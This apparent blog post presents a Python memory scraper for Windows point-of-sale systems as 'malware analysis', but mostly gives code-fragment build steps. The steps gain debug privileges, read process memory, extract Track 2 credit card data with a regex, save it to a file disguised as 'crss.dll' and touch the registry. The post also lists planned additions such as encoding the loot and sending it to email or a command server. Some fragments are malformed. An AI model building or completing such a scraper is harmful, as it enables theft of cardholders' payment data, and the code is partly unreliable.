Point-of-Sale Malware Instrumentation Analysis: Memory Scraper in Python

Title: Memory Scanning a Windows Process in Python Using winappdbg
Purpose: Analyze Python memory scanning point-of-sale (PoS) malware for credit card data

Analysis Steps:
(1) Display the Windows version and the current architecture

from winappdbg import *
System.os, System.arch, System.bits

(2) Create a snapshot of running processes

System.request_debug_privileges(), System.scan_processes()

(3) Obtain local username (from getpass.getuser())
(4) Create a writeable file in %APPDATA%

System.request_debug_privileges(), System.scan_processes()
dump_writer = open('C:\\Documents and Settings\\'+UserName+'\\Application Data\\crss.dll', 'w+')

(5) Obtain all processes that match the requested filenames:

(6) Get a memory map of the process

memoryMap  = process.get_memory_map()
mappedFilenames = process.get_mapped_filenames(memoryMap)

(7) For each memory block in the map read address and size of memory blocks, its state (free or allocated), page protection bits (looking for win32.MEM_COMMIT), and its memory type:
(8) Read the data from memory 

if mbi.has_content() and mbi.State == win32.MEM_COMMIT

(9) Implement a simple Regular Expression looking for Track2 data

dump_regex = re.findall(r'%B\d{0,19}\^[\w\s\/]{2,26}\^\d{7}\w*\?', data)

(10) Beautify the extracted data
(11) Write dump data into crss.dll
(12) Write the data to registry

import _winreg
hKey = CreateKey(HKEY_CURRENT_USER, "SOFTWARE\\Microsoft\\Internet Explorer\\")subKey = SetValueEx( hKey, "Test", 0, REG_BINARY, "666" )

Missing features are as follows:
(1) Encode Saved Data
(2) Add Luhn Algorithm
(3) Create a multithreaded process for this algorithm
(4) Send data to email/C2

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out /  Change )

Twitter picture

You are commenting using your Twitter account. Log Out /  Change )

Facebook photo

You are commenting using your Facebook account. Log Out /  Change )

Connecting to %s

%d bloggers like this: